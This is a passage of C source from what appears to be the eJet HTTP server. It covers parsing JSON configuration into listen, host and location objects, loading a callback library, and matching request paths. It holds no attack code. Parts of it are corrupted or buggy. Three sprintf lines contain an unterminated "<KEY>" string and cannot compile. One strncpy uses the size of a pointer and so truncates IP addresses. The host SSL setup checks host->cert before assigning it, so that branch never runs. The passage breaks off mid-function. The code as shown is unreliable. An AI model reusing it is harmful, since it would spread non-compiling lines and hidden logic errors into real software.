for (j = 1; j < (int)ploc->indexnum && j < sizeof(ploc->index)/sizeof(ploc->index[0]); j++) {
sprintf(key, "index[%d]", j);
ret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->index[j] = value;
}
}
}
ret = json_mgetP(jloc, "passurl", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->passurl = value;
}
ret = json_mgetP(jloc, "cache", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
ploc->cache = 1;
else
ploc->cache = 0;
}
ret = json_mgetP(jloc, "cache file", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->cachefile = value;
}
ret = json_mgetP(jloc, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(ploc->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>);
subret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0) {
arr_push(ploc->script_list, ckstr_new(value, valuelen));
}
}
}
ret = json_mgetP(jloc, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(ploc->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0) {
arr_push(ploc->reply_script_list, ckstr_new(value, valuelen));
}
}
}
nextloc:
sprintf(key, "location[%d]", i);
ret = json_mget_obj(jhost, key, -1, &jloc);
if (ret <= 0) break;
}
return 0;
}
void * http_host_alloc (char * hostn, int hostlen)
{
HTTPHost * host = NULL;
if (!hostn) return NULL;
if (hostlen < 0) hostlen = strlen(hostn);
host = kzalloc(sizeof(*host));
if (!host) return NULL;
str_secpy(host->hostname, sizeof(host->hostname)-1, hostn, hostlen);
InitializeCriticalSection(&host->hostCS);
host->exact_loc_table = ht_new(64, http_loc_cmp_path);
host->prefix_loc_list = arr_new(4);
host->prefix_actrie = actrie_init(128, NULL, 0);
host->regex_loc_list = arr_new(4);
host->regex_list = arr_new(4);
host->uploadloc = NULL;
host->defaultloc = NULL;
host->script_list = arr_new(2);
host->reply_script_list = arr_new(2);
InitializeCriticalSection(&host->texttplCS);
host->texttpl_tab = ht_new(300, http_pagetpl_cmp_key);
ht_set_hash_func(host->texttpl_tab, ckstr_string_hash);
InitializeCriticalSection(&host->listtplCS);
host->listtpl_tab = ht_new(300, http_pagetpl_cmp_key);
ht_set_hash_func(host->listtpl_tab, ckstr_string_hash);
return host;
}
void http_host_free (void * vhost)
{
HTTPHost * host = (HTTPHost *)vhost;
int i, num;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg = NULL;
#endif
if (!host) return;
#ifdef HAVE_OPENSSL
if (host->sslctx) {
http_ssl_ctx_free(host->sslctx);
host->sslctx = NULL;
}
#endif
/* ploc instanc hash table freed, used as exact path matching */
if (host->exact_loc_table) {
ht_free_all(host->exact_loc_table, http_loc_free);
host->exact_loc_table = NULL;
}
/* ploc instanc list freed, used as path prefix matching */
if (host->prefix_loc_list) {
arr_pop_free(host->prefix_loc_list, http_loc_free);
host->prefix_loc_list = NULL;
}
/* freeing Wu-Manber multi-pattern matching object */
if (host->prefix_actrie) {
actrie_free(host->prefix_actrie);
host->prefix_actrie = NULL;
}
/* ploc instance list freed, used as regex matching */
if (host->regex_loc_list) {
arr_pop_free(host->regex_loc_list, http_loc_free);
host->regex_loc_list = NULL;
}
if (host->regex_list) {
num = arr_num(host->regex_list);
for (i = 0; i < num; i++) {
preg = arr_value(host->regex_list, i);
#ifdef UNIX
regfree(preg);
kfree(preg);
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre_free(preg);
#endif
}
arr_free(host->regex_list);
host->regex_list = NULL;
}
if (host->uploadloc) {
http_loc_free(host->uploadloc);
host->uploadloc = NULL;
}
if (host->defaultloc) {
http_loc_free(host->defaultloc);
host->defaultloc = NULL;
}
arr_pop_kfree(host->script_list);
arr_pop_kfree(host->reply_script_list);
DeleteCriticalSection(&host->hostCS);
DeleteCriticalSection(&host->texttplCS);
if (host->texttpl_tab) {
ht_free_all(host->texttpl_tab, http_pagetpl_free);
host->texttpl_tab = NULL;
}
DeleteCriticalSection(&host->listtplCS);
if (host->listtpl_tab) {
ht_free_all(host->listtpl_tab, http_pagetpl_free);
host->listtpl_tab = NULL;
}
kfree(host);
}
void * http_host_create (void * vhl, char * hostn, int hostlen, char * root,
char * cert, char * prikey, char * cacert)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
ckstr_t key;
if (!hl) return NULL;
if (hostn && hostlen < 0) hostlen = strlen(hostn);
EnterCriticalSection(&hl->hlCS);
if (!hostn || hostlen <= 0 || (hostlen == 1 && hostn[0] == '*')) {
if (!hl->defaulthost)
hl->defaulthost = http_host_alloc("*", 1);
host = hl->defaulthost;
} else {
key.p = hostn; key.len = hostlen;
host = ht_get(hl->host_table, &key);
if (!host) {
host = http_host_alloc(hostn, hostlen);
ht_set(hl->host_table, &key, host);
}
}
LeaveCriticalSection(&hl->hlCS);
if (!host) return NULL;
if (root && strlen(root) > 0) {
str_secpy(host->root, sizeof(host->root), root, strlen(root));
} else if (root) {
host->root[0] = '\0';
}
/* SNI mechanism in TLS spec enables the client can select one
from multiple cetificates coresponding to different host-names.
Therefore, NULL host-name can not be bound SSL certificate, key. */
if (hl->ssl_link && host->cert && strlen(host->cert) > 0 &&
host->prikey && strlen(host->prikey) > 0)
{
host->cert = cert;
host->prikey = prikey;
host->cacert = cacert;
#ifdef HAVE_OPENSSL
host->sslctx = http_ssl_server_ctx_init(host->cert, host->prikey, host->cacert);
#endif
}
return host;
}
int http_host_cmp (void * vhost, void * vname)
{
HTTPHost * host = (HTTPHost *)vhost;
ckstr_t * ckstr = (ckstr_t *)vname;
ckstr_t tmp;
if (!host) return -1;
if (!ckstr) return 1;
tmp.p = host->hostname;
tmp.len = strlen(host->hostname);
return ckstr_casecmp(&tmp, ckstr);
}
int http_host_build (void * vhl, void * jhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
int i, hostnum;
int ret = 0, subret;
int j, num = 0;
int code = 0;
char key[128];
int keylen = 0;
char * value = NULL;
int valuelen = 0;
void * jhost = NULL;
char * hname = NULL;
int hnamelen = 0;
char * root = NULL;
char * cert = NULL;
char * prikey = NULL;
char * cacert = NULL;
void * jerrpage = NULL;
if (!hl) return -1;
if (!jhl) return -2;
sprintf(key, "host");
ret = json_mget_obj(jhl, key, -1, &jhost);
if (ret <= 0) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> has no <Host> configure option!\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return -100;
}
for (hostnum = ret, i = 1; i <= hostnum && jhost != NULL; i++) {
hname = NULL;
hnamelen = 0;
root = NULL;
cert = NULL; prikey = NULL; cacert = NULL;
ret = json_mgetP(jhost, "host name", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
hname = value;
}
hnamelen = valuelen;
ret = json_mgetP(jhost, "root", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
root = value;
}
ret = json_mgetP(jhost, "ssl certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cert = value;
}
ret = json_mgetP(jhost, "ssl private key", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
prikey = value;
}
ret = json_mgetP(jhost, "ssl ca certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cacert = value;
}
/* create HTTPHost instance */
host = http_host_create(hl, hname, hnamelen, root, cert, prikey, cacert);
if (!host) break;
host->jsonobj = jhost;
ret = json_mgetP(jhost, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(host->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>
subret = json_mgetP(jhost, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(host->script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhost, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(host->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jhost, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(host->reply_script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhost, "gzip", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
host->gzip = 1;
else
host->gzip = 0;
}
/* parse the 'error page' object */
ret = json_mget_obj(jhost, "error page", -1, &jerrpage);
if (ret > 0) {
json_mgetP(jerrpage, "root", -1, (void **)&host->errpage.root, &valuelen);
num = json_num(jerrpage);
for (j = 0; j < num; j++) {
ret = json_iter(jerrpage, j, (void **)&hname, &keylen,
(void **)&value, &valuelen, NULL);
if (ret > 0 && hname && keylen > 0) {
code = strtol(hname, NULL, 10);
if (code >= 400 && code < 420)
host->errpage.err400[code - 400] = value;
else if (code >= 500 && code < 520)
host->errpage.err500[code - 500] = value;
}
}
}
http_loc_build(host, jhost);
sprintf(key, "host[%d]", i);
ret = json_mget_obj(jhl, key, -1, &jhost);
if (ret <= 0) break;
}
return 0;
}
void * http_listen_alloc (char * localip, int port, uint8 fwdpxy)
{
HTTPListen * hl = NULL;
if (port == 0) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
hl = kzalloc(sizeof(*hl));
if (!hl) return NULL;
if (localip)
strncpy(hl->localip, localip, sizeof(localip)-1);
hl->port = port;
hl->forwardproxy = fwdpxy;
hl->mlisten = NULL;
InitializeCriticalSection(&hl->hlCS);
hl->host_table = ht_only_new(64, http_host_cmp);
ht_set_hash_func(hl->host_table, ckstr_string_hash);
hl->defaulthost = NULL;
hl->reqdiag = NULL;
hl->reqdiagobj = NULL;
hl->script_list = arr_new(2);
hl->reply_script_list = arr_new(2);
return hl;
}
void http_listen_free (void * vhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
int i;
if (!hl) return;
arr_pop_kfree(hl->script_list);
arr_pop_kfree(hl->reply_script_list);
if (hl->mlisten) {
mlisten_close(hl->mlisten);
hl->mlisten = NULL;
}
#ifdef HAVE_OPENSSL
if (hl->sslctx) {
http_ssl_ctx_free(hl->sslctx);
hl->sslctx = NULL;
}
#endif
DeleteCriticalSection(&hl->hlCS);
if (hl->host_table) {
ht_free_all(hl->host_table, http_host_free);
hl->host_table = NULL;
}
if (hl->defaulthost) {
http_host_free(hl->defaulthost);
hl->defaulthost = NULL;
}
for (i = 0; i < 16 && i < hl->cbargc; i++) {
if (hl->cbargv[i]) {
kfree(hl->cbargv[i]);
hl->cbargv[i] = NULL;
}
}
if (hl->cbhandle) {
if (hl->cbclean)
(*hl->cbclean)(hl->cbobj);
#ifdef UNIX
dlclose(hl->cbhandle);
#endif
#if defined(_WIN32) || defined(_WIN64)
FreeLibrary(hl->cbhandle);
#endif
hl->cbhandle = NULL;
}
kfree(hl);
}
int http_listen_ssl_ctx_set (void * vhl, char * cert, char * prikey, char * cacert)
{
HTTPListen * hl = (HTTPListen *)vhl;
if (!hl) return -1;
hl->ssl_link = 1;
#ifdef HAVE_OPENSSL
if (hl->sslctx) {
http_ssl_ctx_free(hl->sslctx);
hl->sslctx = NULL;
}
#endif
hl->cert = cert;
hl->prikey = prikey;
hl->cacert = cacert;
#ifdef HAVE_OPENSSL
hl->sslctx = http_ssl_server_ctx_init(hl->cert, hl->prikey, hl->cacert);
#endif
return 0;
}
void * http_listen_ssl_ctx_get (void * vhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
if (!hl) return NULL;
return hl->sslctx;
}
void * http_listen_host_get (void * vhl, char * servname)
{
HTTPListen * hl = (HTTPListen *)vhl;
ckstr_t key;
void * host = NULL;
if (!hl) return NULL;
key.p = servname; key.len = str_len(servname);
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
LeaveCriticalSection(&hl->hlCS);
return host;
}
int http_listen_cblibfile_set (void * vhl, char * cblibfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
#ifdef UNIX
char * err = NULL;
#endif
char * argv[16];
int i, plen[16];
if (!hl) return -1;
if (!cblibfile) return -2;
/* firstly release all resources allocated before */
if (hl->cbhandle) {
if (hl->cbclean)
(*hl->cbclean)(hl->cbobj);
#ifdef UNIX
dlclose(hl->cbhandle);
#endif
#if defined(_WIN32) || defined(_WIN64)
FreeLibrary(hl->cbhandle);
#endif
hl->cbhandle = NULL;
}
for (i = 0; i < hl->cbargc; i++) {
kfree(hl->cbargv[i]);
hl->cbargv[i] = NULL;
}
hl->cbargc = 0;
/* now create new instance for new lib-file */
hl->cbargc = string_tokenize(cblibfile, -1, " \t\r\n\f\v", 6, (void **)argv, plen, 16);
for (i = 0; i < hl->cbargc; i++) {
hl->cbargv[i] = str_dup(argv[i], plen[i]);
}
hl->cblibfile = cblibfile;
#ifdef UNIX
hl->cbhandle = dlopen(hl->cbargv[0], RTLD_LAZY | RTLD_GLOBAL);
err = dlerror();
if (!hl->cbhandle) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> Loading DynLib <%s> error! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
cblibfile, err ? err : "");
return -100;
}
hl->cbinit = dlsym(hl->cbhandle, "http_handle_init");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_init' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbinit = NULL;
}
hl->cbfunc = dlsym(hl->cbhandle, "http_handle");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbfunc = NULL;
}
hl->cbclean = dlsym(hl->cbhandle, "http_handle_clean");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_clean' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbclean = NULL;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
hl->cbhandle = LoadLibrary(hl->cbargv[0]);
if (!hl->cbhandle) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> Loading DynLib <%s> error! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
cblibfile, GetLastError());
return -100;
}
hl->cbinit = (HTTPCBInit *)GetProcAddress(hl->cbhandle, "http_handle_init");
if (hl->cbinit == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_init' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbinit = NULL;
}
hl->cbfunc = (HTTPCBHandler *)GetProcAddress(hl->cbhandle, "http_handle");
if (hl->cbfunc == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbfunc = NULL;
}
hl->cbclean = (HTTPCBClean *)GetProcAddress(hl->cbhandle, "http_handle_clean");
if (hl->cbclean == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_clean' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbclean = NULL;
}
#endif
if (hl->cbhandle && hl->cbinit) {
hl->cbobj = (*hl->cbinit)(hl->httpmgmt, hl->cbargc, hl->cbargv);
}
if (hl->cbfunc)
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> load successfully!\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "", hl->cblibfile);
return 0;
}
int http_listen_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->listenlistCS);
if (!mgmt->listen_list) {
mgmt->listen_list = arr_new(4);
}
return http_listen_build (mgmt);
}
int http_listen_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = arr_value(mgmt->listen_list, i);
if (!hl) continue;
tolog(1, "eJet - HTTP Listen <%s:%d%s> stopped.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
http_listen_free(hl);
}
arr_free(mgmt->listen_list);
mgmt->listen_list = NULL;
DeleteCriticalSection(&mgmt->listenlistCS);
return 0;
}
void * http_listen_add (void * vmgmt, char * localip, int port, uint8 fwdpxy)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return NULL;
if (port == 0) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port == port && strcasecmp(hl->localip, localip) == 0) {
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
}
hl = http_listen_alloc(localip, port, fwdpxy);
if (hl) {
hl->httpmgmt = mgmt;
arr_push(mgmt->listen_list, hl);
}
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
int http_listen_start_all (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * mlisten = NULL;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->mlisten) continue;
mlisten = eptcp_mlisten(mgmt->pcore,
strlen(hl->localip) > 0 ? hl->localip : NULL,
hl->port, hl, (IOHandler *)http_pump, mgmt);
if (!mlisten) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> failed.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
continue;
}
hl->mlisten = mlisten;
tolog(1, "eJet - HTTP Listen <%s:%d%s> started.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
}
LeaveCriticalSection(&mgmt->listenlistCS);
return 0;
}
void * http_ssl_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy,
uint8 ssl, char * cert, char * prikey, char * cacert, char * libfile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
void * mlisten = NULL;
if (!mgmt) return NULL;
hl = http_listen_add(mgmt, localip, port, fwdpxy);
if (!hl) return NULL;
if (ssl > 0)
http_listen_ssl_ctx_set(hl, cert, prikey, cacert);
if (libfile)
http_listen_cblibfile_set(hl, libfile);
if (!hl->defaulthost)
http_host_create(hl, NULL, -1, NULL, NULL, NULL, NULL);
if (hl->mlisten) return hl;
mlisten = eptcp_mlisten(mgmt->pcore,
strlen(hl->localip) > 0 ? hl->localip : NULL,
hl->port, hl, (IOHandler *)http_pump, mgmt);
if (!mlisten) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> failed.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return hl;
}
hl->mlisten = mlisten;
tolog(1, "eJet - HTTP Listen <%s:%d%s> started.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return hl;
}
void * http_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy, char * libfile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return http_ssl_listen_start(mgmt, localip, port, fwdpxy, 0, NULL, NULL, NULL, libfile);
}
int http_listen_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
LeaveCriticalSection(&mgmt->listenlistCS);
return num;
}
void * http_listen_get (void * vmgmt, int index)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
EnterCriticalSection(&mgmt->listenlistCS);
hl = arr_value(mgmt->listen_list, index);
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
void * http_listen_find (void * vmgmt, char * localip, int port)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port == port && strcasecmp(hl->localip, localip) == 0) {
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
return NULL;
}
int http_listen_stop (void * vmgmt, char * localip, int port)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
if (port == 0) return -2;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (!hl->mlisten) {
arr_delete(mgmt->listen_list, i); i--; num--;
http_listen_free(hl);
continue;
}
if (hl->port == port && mlisten_port(hl->mlisten) == port &&
strcasecmp(hl->localip, localip) == 0)
{
arr_delete(mgmt->listen_list, i);
LeaveCriticalSection(&mgmt->listenlistCS);
http_listen_free(hl);
return 0;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
return -1;
}
int http_listen_check_self (void * vmgmt, char * host, int hostlen, char * dstip, int dstport)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, j, num;
int port_listened = 0;
ckstr_t key;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port != dstport) continue;
port_listened++;
key.p = host; key.len = hostlen;
if (ht_get(hl->host_table, &key) != NULL) {
LeaveCriticalSection(&mgmt->listenlistCS);
/* checked host is one of hosts under listened port */
return 1;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
if (!port_listened) return 0;
/* check if the dstpip is loop-back ip */
if (strcasecmp(dstip, "127.0.0.1") == 0) {
return 1;
}
/* check if the dstpip is local server ip */
for (j = 0; dstip && j < mgmt->addrnum; j++) {
if (strcasecmp(dstip, mgmt->localaddr[j].ipstr) == 0) {
return 1;
}
}
return 0;
}
int http_listen_build (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, j, hlnum, ret = 0, subret;
char key[128];
char * value = NULL;
int valuelen = 0;
void * jhl = NULL;
char * ip = NULL;
int port = 0;
int forwardproxy = 0;
int ssl = 0;
char * cert;
char * prikey;
char * cacert;
char * libfile = NULL;
if (!mgmt) return -1;
sprintf(key, "http.listen");
ret = json_mget_value(mgmt->cnfjson, key, -1, (void **)&value, &valuelen, &jhl);
if (ret <= 0) {
tolog(1, "eJet - No HTTPListen configured!\n");
return -100;
}
for (hlnum = ret, i = 1; i <= hlnum && jhl != NULL; i++) {
ip = NULL;
port = 0;
forwardproxy = 0;
ssl = 0;
libfile = NULL;
cert = NULL;
prikey = NULL;
cacert = NULL;
ret = json_mgetP(jhl, "local ip", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ip = value;
}
json_mget_int(jhl, "port", -1, &port);
ret = json_mgetP(jhl, "forward proxy", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
forwardproxy = 1;
else
forwardproxy = 0;
}
ret = json_mgetP(jhl, "ssl", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
ssl = 1;
else
ssl = 0;
}
ret = json_mgetP(jhl, "ssl certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cert = value;
}
ret = json_mgetP(jhl, "ssl private key", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
prikey = value;
}
ret = json_mgetP(jhl, "ssl ca certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cacert = value;
}
ret = json_mgetP(jhl, "request process library", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
libfile = value;
}
hl = http_listen_add(mgmt, ip, port, forwardproxy);
if (hl) {
hl->jsonobj = jhl;
if (ssl)
http_listen_ssl_ctx_set(hl, cert, prikey, cacert);
if (libfile)
http_listen_cblibfile_set(hl, libfile);
ret = json_mgetP(jhl, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(hl->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>);
subret = json_mgetP(jhl, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(hl->script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhl, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(hl->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jhl, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(hl->reply_script_list, ckstr_new(value, valuelen));
}
}
http_host_build(hl, jhl);
}
sprintf(key, "http.listen[%d]", i);
ret = json_mget_obj(mgmt->cnfjson, key, -1, &jhl);
if (ret <= 0) break;
}
http_listen_start_all(mgmt);
return 0;
}
void * http_host_instance (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
ckstr_t key;
if (!msg) return NULL;
hl = (HTTPListen *)msg->hl;
if (!hl) return NULL;
key.p = msg->req_host;
key.len = msg->req_hostlen;
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
if (!host) {
host = hl->defaulthost;
}
LeaveCriticalSection(&hl->hlCS);
return host;
}
void * http_loc_instance (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
ckstr_t key;
char buf[4096];
int ret = 0;
int i, j, num;
#ifdef UNIX
regmatch_t pmat[16];
#endif
#if defined(_WIN32) || defined(_WIN64)
int ovec[36];
#endif
if (!msg) return NULL;
hl = (HTTPListen *)msg->hl;
if (!hl) return NULL;
/* Location instance times must be not greater than 16 */
if (++msg->locinst_times >= 16)
return NULL;
key.p = msg->req_host;
key.len = msg->req_hostlen;
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
if (!host) {
host = hl->defaulthost;
}
LeaveCriticalSection(&hl->hlCS);
if (!host) return NULL;
msg->phost = host;
/* for CONNECT method, req_path is NULL */
if (!msg->docuri->path || msg->docuri->pathlen <= 0)
return NULL;
str_secpy(buf, sizeof(buf)-1, msg->docuri->path, msg->docuri->pathlen);
/* exact matching check if request path is completely equal to location path */
ploc = ht_get(host->exact_loc_table, buf);
if (ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = msg->docuri->pathlen;
goto retloc;
}
/* prefix matching check if request path has the same prefix with location path */
ret = actrie_get(host->prefix_actrie, msg->docuri->path, msg->docuri->pathlen, (void **)&ploc);
if (ret > 0 && ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = ret;
goto retloc;
}
/* regular expression matching check if request path is matched by regex */
num = arr_num(host->regex_list);
for (i = 0; i < num; i++) {
#ifdef UNIX
ret = regexec(arr_value(host->regex_list, i), buf, 16, pmat, 0);
if (ret == 0) {
#endif
#if defined(_WIN32) || defined(_WIN64)
